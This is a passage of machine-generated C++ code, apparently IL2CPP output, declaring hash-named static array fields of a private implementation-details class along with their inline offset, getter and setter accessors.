___CE5835130F5277F63D716FC9115526B0AC68FFAD_107; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=6 <PrivateImplementationDetails>::CE93C35B755802BC4B3D180716B048FC61701EF7 __StaticArrayInitTypeSizeU3D6_tC937DCE458F6AE4186120B4DDF95463176C75C78 ___CE93C35B755802BC4B3D180716B048FC61701EF7_108; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=64 <PrivateImplementationDetails>::CF0B42666EF5E37EDEA0AB8E173E42C196D03814 __StaticArrayInitTypeSizeU3D64_tC44517F575DC9AEC7589A864FEA072030961DAF6 ___CF0B42666EF5E37EDEA0AB8E173E42C196D03814_109; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=256 <PrivateImplementationDetails>::D002CBBE1FF33721AF7C4D1D3ECAD1B7DB5258B7 __StaticArrayInitTypeSizeU3D256_t9003B1E1E8C82BC25ADE7407C58A314C292B326F ___D002CBBE1FF33721AF7C4D1D3ECAD1B7DB5258B7_110; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=32 <PrivateImplementationDetails>::D117188BE8D4609C0D531C51B0BB911A4219DEBE __StaticArrayInitTypeSizeU3D32_t06FF35439BDF1A6AAB50820787FA5D7A4FA09472 ___D117188BE8D4609C0D531C51B0BB911A4219DEBE_111; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=32 <PrivateImplementationDetails>::D28E8ABDBD777A482CE0EE5C24814ACAE52AABFE __StaticArrayInitTypeSizeU3D32_t06FF35439BDF1A6AAB50820787FA5D7A4FA09472 ___D28E8ABDBD777A482CE0EE5C24814ACAE52AABFE_112; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=256 <PrivateImplementationDetails>::D2C5BAE967587C6F3D9F2C4551911E0575A1101F __StaticArrayInitTypeSizeU3D256_t9003B1E1E8C82BC25ADE7407C58A314C292B326F ___D2C5BAE967587C6F3D9F2C4551911E0575A1101F_113; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=44 <PrivateImplementationDetails>::D78D08081C7A5AD6FBA7A8DC86BCD6D7A577C636 __StaticArrayInitTypeSizeU3D44_t1383A9A990CD22E4246B656157D17C8051BFAD7F ___D78D08081C7A5AD6FBA7A8DC86BCD6D7A577C636_114; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=76 <PrivateImplementationDetails>::DA19DB47B583EFCF7825D2E39D661D2354F28219 __StaticArrayInitTypeSizeU3D76_t83BE44A74AC13CD15474DA7726C9C92BD317CFFB ___DA19DB47B583EFCF7825D2E39D661D2354F28219_115; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=56 <PrivateImplementationDetails>::DC2B830D8CD59AD6A4E4332D21CA0DCA2821AD82 __StaticArrayInitTypeSizeU3D56_tE92B90DB812A206A3F9FED2827695B30D2F06D10 ___DC2B830D8CD59AD6A4E4332D21CA0DCA2821AD82_116; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=52 <PrivateImplementationDetails>::DD3AEFEADB1CD615F3017763F1568179FEE640B0 __StaticArrayInitTypeSizeU3D52_tF7B918A088A367994FBAEB73123296D8929B543A ___DD3AEFEADB1CD615F3017763F1568179FEE640B0_117; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=36 <PrivateImplementationDetails>::E1827270A5FE1C85F5352A66FD87BA747213D006 __StaticArrayInitTypeSizeU3D36_t553C250FA8609975E44273C4AD8F28E487272E17 ___E1827270A5FE1C85F5352A66FD87BA747213D006_118; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=40 <PrivateImplementationDetails>::E45BAB43F7D5D038672B3E3431F92E34A7AF2571 __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 ___E45BAB43F7D5D038672B3E3431F92E34A7AF2571_119; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=64 <PrivateImplementationDetails>::E75835D001C843F156FBA01B001DFE1B8029AC17 __StaticArrayInitTypeSizeU3D64_tC44517F575DC9AEC7589A864FEA072030961DAF6 ___E75835D001C843F156FBA01B001DFE1B8029AC17_120; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=52 <PrivateImplementationDetails>::E92B39D8233061927D9ACDE54665E68E7535635A __StaticArrayInitTypeSizeU3D52_tF7B918A088A367994FBAEB73123296D8929B543A ___E92B39D8233061927D9ACDE54665E68E7535635A_121; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=12 <PrivateImplementationDetails>::EA9506959484C55CFE0C139C624DF6060E285866 __StaticArrayInitTypeSizeU3D12_tB4B4C95019D88097B57DE7B50445942256BF2879 ___EA9506959484C55CFE0C139C624DF6060E285866_122; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=262 <PrivateImplementationDetails>::EB5E9A80A40096AB74D2E226650C7258D7BC5E9D __StaticArrayInitTypeSizeU3D262_t93124A1A3E9EDF7F1F305BD2FC57372646F3CFD7 ___EB5E9A80A40096AB74D2E226650C7258D7BC5E9D_123; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=64 <PrivateImplementationDetails>::EBF68F411848D603D059DFDEA2321C5A5EA78044 __StaticArrayInitTypeSizeU3D64_tC44517F575DC9AEC7589A864FEA072030961DAF6 ___EBF68F411848D603D059DFDEA2321C5A5EA78044_124; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=10 <PrivateImplementationDetails>::EC5BB4F59D4B9B2E9ECD3904D44A8275F23AFB11 __StaticArrayInitTypeSizeU3D10_t39E3D966A21885323F15EB866ABDE668EA1ED52C ___EC5BB4F59D4B9B2E9ECD3904D44A8275F23AFB11_125; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=3 <PrivateImplementationDetails>::EC83FB16C20052BEE2B4025159BC2ED45C9C70C3 __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E ___EC83FB16C20052BEE2B4025159BC2ED45C9C70C3_126; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=72 <PrivateImplementationDetails>::EC89C317EA2BF49A70EFF5E89C691E34733D7C37 __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 ___EC89C317EA2BF49A70EFF5E89C691E34733D7C37_127; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=40 <PrivateImplementationDetails>::F06E829E62F3AFBC045D064E10A4F5DF7C969612 __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 ___F06E829E62F3AFBC045D064E10A4F5DF7C969612_128; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=11614 <PrivateImplementationDetails>::F073AA332018FDA0D572E99448FFF1D6422BD520 __StaticArrayInitTypeSizeU3D11614_tDF34959BE752359A89A4A577B8798D2D66A5E7F5 ___F073AA332018FDA0D572E99448FFF1D6422BD520_129; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=120 <PrivateImplementationDetails>::F34B0E10653402E8F788F8BC3F7CD7090928A429 __StaticArrayInitTypeSizeU3D120_tBA46FD2E9DA153FD8457EE7F425E8ECC517EA252 ___F34B0E10653402E8F788F8BC3F7CD7090928A429_130; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=72 <PrivateImplementationDetails>::F37E34BEADB04F34FCC31078A59F49856CA83D5B __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 ___F37E34BEADB04F34FCC31078A59F49856CA83D5B_131; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=94 <PrivateImplementationDetails>::F512A9ABF88066AAEB92684F95CC05D8101B462B __StaticArrayInitTypeSizeU3D94_t23554D8B96399688002A3BE81C7C15EFB011DEC6 ___F512A9ABF88066AAEB92684F95CC05D8101B462B_132; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=12 <PrivateImplementationDetails>::F8FAABB821300AA500C2CEC6091B3782A7FB44A4 __StaticArrayInitTypeSizeU3D12_tB4B4C95019D88097B57DE7B50445942256BF2879 ___F8FAABB821300AA500C2CEC6091B3782A7FB44A4_133; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=2350 <PrivateImplementationDetails>::FCBD2781A933F0828ED4AAF88FD8B08D76DDD49B __StaticArrayInitTypeSizeU3D2350_t96984AEF232104302694B7EFDA3F92BC42BF207D ___FCBD2781A933F0828ED4AAF88FD8B08D76DDD49B_134; public: inline static int32_t get_offset_of_U30392525BCB01691D1F319D89F2C12BF93A478467_0() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___0392525BCB01691D1F319D89F2C12BF93A478467_0)); } inline __StaticArrayInitTypeSizeU3D256_t9003B1E1E8C82BC25ADE7407C58A314C292B326F get_U30392525BCB01691D1F319D89F2C12BF93A478467_0() const { return ___0392525BCB01691D1F319D89F2C12BF93A478467_0; } inline __StaticArrayInitTypeSizeU3D256_t9003B1E1E8C82BC25ADE7407C58A314C292B326F * get_address_of_U30392525BCB01691D1F319D89F2C12BF93A478467_0() { return &___0392525BCB01691D1F319D89F2C12BF93A478467_0; } inline void set_U30392525BCB01691D1F319D89F2C12BF93A478467_0(__StaticArrayInitTypeSizeU3D256_t9003B1E1E8C82BC25ADE7407C58A314C292B326F value) { ___0392525BCB01691D1F319D89F2C12BF93A478467_0 = value; } inline static int32_t get_offset_of_U30588059ACBD52F7EA2835882F977A9CF72EB9775_1() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___0588059ACBD52F7EA2835882F977A9CF72EB9775_1)); } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 get_U30588059ACBD52F7EA2835882F977A9CF72EB9775_1() const { return ___0588059ACBD52F7EA2835882F977A9CF72EB9775_1; } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 * get_address_of_U30588059ACBD52F7EA2835882F977A9CF72EB9775_1() { return &___0588059ACBD52F7EA2835882F977A9CF72EB9775_1; } inline void set_U30588059ACBD52F7EA2835882F977A9CF72EB9775_1(__StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 value) { ___0588059ACBD52F7EA2835882F977A9CF72EB9775_1 = value; } inline static int32_t get_offset_of_U30A1ADB22C1D3E1F4B2448EE3F27DF9DE63329C4C_2() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___0A1ADB22C1D3E1F4B2448EE3F27DF9DE63329C4C_2)); } inline __StaticArrayInitTypeSizeU3D84_tF52293EFB26AA1D2C169389BB83253C5BAE8076A get_U30A1ADB22C1D3E1F4B2448EE3F27DF9DE63329C4C_2() const { return ___0A1ADB22C1D3E1F4B2448EE3F27DF9DE63329C4C_2; } inline __StaticArrayInitTypeSizeU3D84_tF52293EFB26AA1D2C169389BB83253C5BAE8076A * get_address_of_U30A1ADB22C1D3E1F4B2448EE3F27DF9DE63329C4C_2() { return &___0A1ADB22C1D3E1F4B2448EE3F27DF9DE63329C4C_2; } inline void set_U30A1ADB22C1D3E1F4B2448EE3F27DF9DE63329C4C_2(__StaticArrayInitTypeSizeU3D84_tF52293EFB26AA1D2C169389BB83253C5BAE8076A value) { ___0A1ADB22C1D3E1F4B2448EE3F27DF9DE63329C4C_2 = value; } inline static int32_t get_offset_of_U3121EC59E23F7559B28D338D562528F6299C2DE22_3() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___121EC59E23F7559B28D338D562528F6299C2DE22_3)); } inline __StaticArrayInitTypeSizeU3D240_t5643A77865294845ACC505FE42EA1067CAC04FD8 get_U3121EC59E23F7559B28D338D562528F6299C2DE22_3() const { return ___121EC59E23F7559B28D338D562528F6299C2DE22_3; } inline __StaticArrayInitTypeSizeU3D240_t5643A77865294845ACC505FE42EA1067CAC04FD8 * get_address_of_U3121EC59E23F7559B28D338D562528F6299C2DE22_3() { return &___121EC59E23F7559B28D338D562528F6299C2DE22_3; } inline void set_U3121EC59E23F7559B28D338D562528F6299C2DE22_3(__StaticArrayInitTypeSizeU3D240_t5643A77865294845ACC505FE42EA1067CAC04FD8 value) { ___121EC59E23F7559B28D338D562528F6299C2DE22_3 = value; } inline static int32_t get_offset_of_U312D04472A8285260EA12FD3813CDFA9F2D2B548C_4() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___12D04472A8285260EA12FD3813CDFA9F2D2B548C_4)); } inline __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E get_U312D04472A8285260EA12FD3813CDFA9F2D2B548C_4() const { return ___12D04472A8285260EA12FD3813CDFA9F2D2B548C_4; } inline __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E * get_address_of_U312D04472A8285260EA12FD3813CDFA9F2D2B548C_4() { return &___12D04472A8285260EA12FD3813CDFA9F2D2B548C_4; } inline void set_U312D04472A8285260EA12FD3813CDFA9F2D2B548C_4(__StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E value) { ___12D04472A8285260EA12FD3813CDFA9F2D2B548C_4 = value; } inline static int32_t get_offset_of_U313A35EF1A549297C70E2AD46045BBD2ECA17852D_5() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___13A35EF1A549297C70E2AD46045BBD2ECA17852D_5)); } inline __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E get_U313A35EF1A549297C70E2AD46045BBD2ECA17852D_5() const { return ___13A35EF1A549297C70E2AD46045BBD2ECA17852D_5; } inline __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E * get_address_of_U313A35EF1A549297C70E2AD46045BBD2ECA17852D_5() { return &___13A35EF1A549297C70E2AD46045BBD2ECA17852D_5; } inline void set_U313A35EF1A549297C70E2AD46045BBD2ECA17852D_5(__StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E value) { ___13A35EF1A549297C70E2AD46045BBD2ECA17852D_5 = value; } inline static int32_t get_offset_of_U31730F09044E91DB8371B849EFF5E6D17BDE4AED0_6() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___1730F09044E91DB8371B849EFF5E6D17BDE4AED0_6)); } inline __StaticArrayInitTypeSizeU3D24_tAB08761D1BC4313A0535E193F4E1A1AFA8B3F123 get_U31730F09044E91DB8371B849EFF5E6D17BDE4AED0_6() const { return ___1730F09044E91DB8371B849EFF5E6D17BDE4AED0_6; } inline __StaticArrayInitTypeSizeU3D24_tAB08761D1BC4313A0535E193F4E1A1AFA8B3F123 * get_address_of_U31730F09044E91DB8371B849EFF5E6D17BDE4AED0_6() { return &___1730F09044E91DB8371B849EFF5E6D17BDE4AED0_6; } inline void set_U31730F09044E91DB8371B849EFF5E6D17BDE4AED0_6(__StaticArrayInitTypeSizeU3D24_tAB08761D1BC4313A0535E193F4E1A1AFA8B3F123 value) { ___1730F09044E91DB8371B849EFF5E6D17BDE4AED0_6 = value; } inline static int32_t get_offset_of_U31A84029C80CB5518379F199F53FF08A7B764F8FD_7() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___1A84029C80CB5518379F199F53FF08A7B764F8FD_7)); } inline __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E get_U31A84029C80CB5518379F199F53FF08A7B764F8FD_7() const { return ___1A84029C80CB5518379F199F53FF08A7B764F8FD_7; } inline __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E * get_address_of_U31A84029C80CB5518379F199F53FF08A7B764F8FD_7() { return &___1A84029C80CB5518379F199F53FF08A7B764F8FD_7; } inline void set_U31A84029C80CB5518379F199F53FF08A7B764F8FD_7(__StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E value) { ___1A84029C80CB5518379F199F53FF08A7B764F8FD_7 = value; } inline static int32_t get_offset_of_U31E41C4CD0767AEA21C00DEABA2EA9407F1E6CEA5_8() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___1E41C4CD0767AEA21C00DEABA2EA9407F1E6CEA5_8)); } inline __StaticArrayInitTypeSizeU3D2048_t95CEED630052F2BBE3122C058EEAD48DB4C2AD02 get_U31E41C4CD0767AEA21C00DEABA2EA9407F1E6CEA5_8() const { return ___1E41C4CD0767AEA21C00DEABA2EA9407F1E6CEA5_8; } inline __StaticArrayInitTypeSizeU3D2048_t95CEED630052F2BBE3122C058EEAD48DB4C2AD02 * get_address_of_U31E41C4CD0767AEA21C00DEABA2EA9407F1E6CEA5_8() { return &___1E41C4CD0767AEA21C00DEABA2EA9407F1E6CEA5_8; } inline void set_U31E41C4CD0767AEA21C00DEABA2EA9407F1E6CEA5_8(__StaticArrayInitTypeSizeU3D2048_t95CEED630052F2BBE3122C058EEAD48DB4C2AD02 value) { ___1E41C4CD0767AEA21C00DEABA2EA9407F1E6CEA5_8 = value; } inline static int32_t get_offset_of_U31FE6CE411858B3D864679DE2139FB081F08BFACD_9() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___1FE6CE411858B3D864679DE2139FB081F08BFACD_9)); } inline __StaticArrayInitTypeSizeU3D16_t35B2E1DB11C9D3150BF800DC30A2808C4F1A1341 get_U31FE6CE411858B3D864679DE2139FB081F08BFACD_9() const { return ___1FE6CE411858B3D864679DE2139FB081F08BFACD_9; } inline __StaticArrayInitTypeSizeU3D16_t35B2E1DB11C9D3150BF800DC30A2808C4F1A1341 * get_address_of_U31FE6CE411858B3D864679DE2139FB081F08BFACD_9() { return &___1FE6CE411858B3D864679DE2139FB081F08BFACD_9; } inline void set_U31FE6CE411858B3D864679DE2139FB081F08BFACD_9(__StaticArrayInitTypeSizeU3D16_t35B2E1DB11C9D3150BF800DC30A2808C4F1A1341 value) { ___1FE6CE411858B3D864679DE2139FB081F08BFACD_9 = value; } inline static int32_t get_offset_of_U3235D99572263B22ADFEE10FDA0C25E12F4D94FFC_10() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___235D99572263B22ADFEE10FDA0C25E12F4D94FFC_10)); } inline __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E get_U3235D99572263B22ADFEE10FDA0C25E12F4D94FFC_10() const { return ___235D99572263B22ADFEE10FDA0C25E12F4D94FFC_10; } inline __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E * get_address_of_U3235D99572263B22ADFEE10FDA0C25E12F4D94FFC_10() { return &___235D99572263B22ADFEE10FDA0C25E12F4D94FFC_10; } inline void set_U3235D99572263B22ADFEE10FDA0C25E12F4D94FFC_10(__StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E value) { ___235D99572263B22ADFEE10FDA0C25E12F4D94FFC_10 = value; } inline static int32_t get_offset_of_U325420D0055076FA8D3E4DD96BC53AE24DE6E619F_11() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___25420D0055076FA8D3E4DD96BC53AE24DE6E619F_11)); } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 get_U325420D0055076FA8D3E4DD96BC53AE24DE6E619F_11() const { return ___25420D0055076FA8D3E4DD96BC53AE24DE6E619F_11; } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 * get_address_of_U325420D0055076FA8D3E4DD96BC53AE24DE6E619F_11() { return &___25420D0055076FA8D3E4DD96BC53AE24DE6E619F_11; } inline void set_U325420D0055076FA8D3E4DD96BC53AE24DE6E619F_11(__StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 value) { ___25420D0055076FA8D3E4DD96BC53AE24DE6E619F_11 = value; } inline static int32_t get_offset_of_U325CF935D2AE9EDF05DD75BCD47FF84D9255D6F6E_12() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___25CF935D2AE9EDF05DD75BCD47FF84D9255D6F6E_12)); } inline __StaticArrayInitTypeSizeU3D1208_tC58894ECFE2C4FFD2B8FCDF958800099A737C1DD get_U325CF935D2AE9EDF05DD75BCD47FF84D9255D6F6E_12() const { return ___25CF935D2AE9EDF05DD75BCD47FF84D9255D6F6E_12; } inline __StaticArrayInitTypeSizeU3D1208_tC58894ECFE2C4FFD2B8FCDF958800099A737C1DD * get_address_of_U325CF935D2AE9EDF05DD75BCD47FF84D9255D6F6E_12() { return &___25CF935D2AE9EDF05DD75BCD47FF84D9255D6F6E_12; } inline void set_U325CF935D2AE9EDF05DD75BCD47FF84D9255D6F6E_12(__StaticArrayInitTypeSizeU3D1208_tC58894ECFE2C4FFD2B8FCDF958800099A737C1DD value) { ___25CF935D2AE9EDF05DD75BCD47FF84D9255D6F6E_12 = value; } inline static int32_t get_offset_of_U329C1A61550F0E3260E1953D4FAD71C256218EF40_13() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___29C1A61550F0E3260E1953D4FAD71C256218EF40_13)); } inline __StaticArrayInitTypeSizeU3D42_t3D9F6218E615F20CE7E1AE0EF6657DE732EDBFD4 get_U329C1A61550F0E3260E1953D4FAD71C256218EF40_13() const { return ___29C1A61550F0E3260E1953D4FAD71C256218EF40_13; } inline __StaticArrayInitTypeSizeU3D42_t3D9F6218E615F20CE7E1AE0EF6657DE732EDBFD4 * get_address_of_U329C1A61550F0E3260E1953D4FAD71C256218EF40_13() { return &___29C1A61550F0E3260E1953D4FAD71C256218EF40_13; } inline void set_U329C1A61550F0E3260E1953D4FAD71C256218EF40_13(__StaticArrayInitTypeSizeU3D42_t3D9F6218E615F20CE7E1AE0EF6657DE732EDBFD4 value) { ___29C1A61550F0E3260E1953D4FAD71C256218EF40_13 = value; } inline static int32_t get_offset_of_U32B33BEC8C30DFDC49DAFE20D3BDE19487850D717_14() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___2B33BEC8C30DFDC49DAFE20D3BDE19487850D717_14)); } inline __StaticArrayInitTypeSizeU3D12_tB4B4C95019D88097B57DE7B50445942256BF2879 get_U32B33BEC8C30DFDC49DAFE20D3BDE19487850D717_14() const { return ___2B33BEC8C30DFDC49DAFE20D3BDE19487850D717_14; } inline __StaticArrayInitTypeSizeU3D12_tB4B4C95019D88097B57DE7B50445942256BF2879 * get_address_of_U32B33BEC8C30DFDC49DAFE20D3BDE19487850D717_14() { return &___2B33BEC8C30DFDC49DAFE20D3BDE19487850D717_14; } inline void set_U32B33BEC8C30DFDC49DAFE20D3BDE19487850D717_14(__StaticArrayInitTypeSizeU3D12_tB4B4C95019D88097B57DE7B50445942256BF2879 value) { ___2B33BEC8C30DFDC49DAFE20D3BDE19487850D717_14 = value; } inline static int32_t get_offset_of_U32BA840FF6020B8FF623DBCB7188248CF853FAF4F_15() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___2BA840FF6020B8FF623DBCB7188248CF853FAF4F_15)); } inline __StaticArrayInitTypeSizeU3D36_t553C250FA8609975E44273C4AD8F28E487272E17 get_U32BA840FF6020B8FF623DBCB7188248CF853FAF4F_15() const { return ___2BA840FF6020B8FF623DBCB7188248CF853FAF4F_15; } inline __StaticArrayInitTypeSizeU3D36_t553C250FA8609975E44273C4AD8F28E487272E17 * get_address_of_U32BA840FF6020B8FF623DBCB7188248CF853FAF4F_15() { return &___2BA840FF6020B8FF623DBCB7188248CF853FAF4F_15; } inline void set_U32BA840FF6020B8FF623DBCB7188248CF853FAF4F_15(__StaticArrayInitTypeSizeU3D36_t553C250FA8609975E44273C4AD8F28E487272E17 value) { ___2BA840FF6020B8FF623DBCB7188248CF853FAF4F_15 = value; } inline static int32_t get_offset_of_U32C840AFA48C27B9C05593E468C1232CA1CC74AFD_16() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___2C840AFA48C27B9C05593E468C1232CA1CC74AFD_16)); } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 get_U32C840AFA48C27B9C05593E468C1232CA1CC74AFD_16() const { return ___2C840AFA48C27B9C05593E468C1232CA1CC74AFD_16; } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 * get_address_of_U32C840AFA48C27B9C05593E468C1232CA1CC74AFD_16() { return &___2C840AFA48C27B9C05593E468C1232CA1CC74AFD_16; } inline void set_U32C840AFA48C27B9C05593E468C1232CA1CC74AFD_16(__StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 value) { ___2C840AFA48C27B9C05593E468C1232CA1CC74AFD_16 = value; } inline static int32_t get_offset_of_U32D1DA5BB407F0C11C3B5116196C0C6374D932B20_17() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___2D1DA5BB407F0C11C3B5116196C0C6374D932B20_17)); } inline __StaticArrayInitTypeSizeU3D16_t35B2E1DB11C9D3150BF800DC30A2808C4F1A1341 get_U32D1DA5BB407F0C11C3B5116196C0C6374D932B20_17() const { return ___2D1DA5BB407F0C11C3B5116196C0C6374D932B20_17; } inline __StaticArrayInitTypeSizeU3D16_t35B2E1DB11C9D3150BF800DC30A2808C4F1A1341 * get_address_of_U32D1DA5BB407F0C11C3B5116196C0C6374D932B20_17() { return &___2D1DA5BB407F0C11C3B5116196C0C6374D932B20_17; } inline void set_U32D1DA5BB407F0C11C3B5116196C0C6374D932B20_17(__StaticArrayInitTypeSizeU3D16_t35B2E1DB11C9D3150BF800DC30A2808C4F1A1341 value) { ___2D1DA5BB407F0C11C3B5116196C0C6374D932B20_17 = value; } inline static int32_t get_offset_of_U32D3CF0F15AC2DDEC2956EA1B7BBE43FB8B923130_18() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___2D3CF0F15AC2DDEC2956EA1B7BBE43FB8B923130_18)); } inline __StaticArrayInitTypeSizeU3D14_tAC1FF6EBB83457B9752372565F242D9A7C69FD05 get_U32D3CF0F15AC2DDEC2956EA1B7BBE43FB8B923130_18() const { return ___2D3CF0F15AC2DDEC2956EA1B7BBE43FB8B923130_18; } inline __StaticArrayInitTypeSizeU3D14_tAC1FF6EBB83457B9752372565F242D9A7C69FD05 * get_address_of_U32D3CF0F15AC2DDEC2956EA1B7BBE43FB8B923130_18() { return &___2D3CF0F15AC2DDEC2956EA1B7BBE43FB8B923130_18; } inline void set_U32D3CF0F15AC2DDEC2956EA1B7BBE43FB8B923130_18(__StaticArrayInitTypeSizeU3D14_tAC1FF6EBB83457B9752372565F242D9A7C69FD05 value) { ___2D3CF0F15AC2DDEC2956EA1B7BBE43FB8B923130_18 = value; } inline static int32_t get_offset_of_U32F71D2DA12F3CD0A6A112F5A5A75B4FDC6FE8547_19() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___2F71D2DA12F3CD0A6A112F5A5A75B4FDC6FE8547_19)); } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 get_U32F71D2DA12F3CD0A6A112F5A5A75B4FDC6FE8547_19() const { return ___2F71D2DA12F3CD0A6A112F5A5A75B4FDC6FE8547_19; } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 * get_address_of_U32F71D2DA12F3CD0A6A112F5A5A75B4FDC6FE8547_19() { return &___2F71D2DA12F3CD0A6A112F5A5A75B4FDC6FE8547_19; } inline void set_U32F71D2DA12F3CD0A6A112F5A5A75B4FDC6FE8547_19(__StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 value) { ___2F71D2DA12F3CD0A6A112F5A5A75B4FDC6FE8547_19 = value; } inline static int32_t get_offset_of_U3320B018758ECE3752FFEDBAEB1A6DB67C80B9359_20() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___320B018758ECE3752FFEDBAEB1A6DB67C80B9359_20)); } inline 